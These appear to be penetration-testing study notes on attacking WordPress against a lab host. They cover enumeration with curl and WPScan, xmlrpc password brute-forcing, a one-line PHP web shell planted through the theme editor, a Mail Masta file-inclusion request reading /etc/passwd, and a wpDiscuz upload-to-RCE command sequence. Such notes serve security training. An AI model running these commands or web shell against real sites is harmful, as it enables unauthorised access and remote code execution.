An open-source Content Management System (CMS).
Enumeration
To identify a WordPress site we can visit the /robots.txt file. Furthermore, the presence of the /wp-admin and /wp-content directories would be a dead giveaway.
WordPress stores its plugins in the wp-content/plugins and themes wp-content/themes. These can often lead to RCE.
On wordpress there exists 5 types of users:
- Administrator: full access
- Editor: publish and manage posts, even of other users.
- Author: can publish and manage their own posts
- Contributor: write and manage their own posts but no publishing
- Subscriber: browser posts and edit their profiles
We can also check the WordPress source for any mention of it
curl -s http://blog.inlanefreight.local | grep WordPress
# enumerate themes
curl -s http://blog.inlanefreight.local/ | grep themes
# enumerate plugins
curl -s http://blog.inlanefreight.local/ | grep plugins Users
Visiting /wp-login.php, a valid username and an invalid password will result in the a different message from a invalid username.
WPScan
Automated WordPress scanner and enumeration tool. We can also pull in vulnerability information from external sources via the API token from WPVulnDB, that is paid.
sudo wpscan --url http://blog.inlanefreight.local --enumerate --api-token dEOFB<SNIP>Attacking
We can attempt login brute forcing to two different components:
- wp-login will attempt to brute force the standard WordPress login page
- xmlrpc method uses WordPress API to make login attempts through
/xmlrpc.php. It is usually faster
sudo wpscan --password-attack xmlrpc -t 20 -U john -P /usr/share/wordlists/rockyou.txt --url http://blog.inlanefreight.localIf we have administrative access to Wordpress, we can modify the PHP source to execute system commands. We can access the Appearance page and select Theme Editor. We can now edit the PHP source code directly and can edit an uncommon page with
# execute commands via the GET parameter 0
system($_GET[0]);Then just Update File and manually access the page at /wp-content/themes/<theme name>
We may also use the wp_admin_shell_upload module from Metasploit.
WordPress has also been the target of a lot of vulnerabilities, a lot of them being due to poorly coded plugins.
We can use the waybackurls tool to find older versions of a target site using the Wayback Machine to find version of the site using a plugin that has a known vulnerability. If the plugin wasn’t removed properly we may still be able to access the directory.
Mail Pasta
No longer supported and is vulnerable to unauthenticated SQL injection and Local File Inclusion. By using the pl parameter we can include a file without any validation.
curl -s http://blog.inlanefreight.local/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwdwpDiscuz
Version number 7.0.4 is vulnerable to a RCE exploit. The mime type functions can be bypassed allowing upload of a PHP file with RCE.
# upload
python3 wp_discuz.py -u http://blog.inlanefreight.local -p /?p=1
# execution
curl -s http://blog.inlanefreight.local/wp-content/uploads/2021/08/uthsdkbywoxeebg-1629904090.8191.php?cmd=id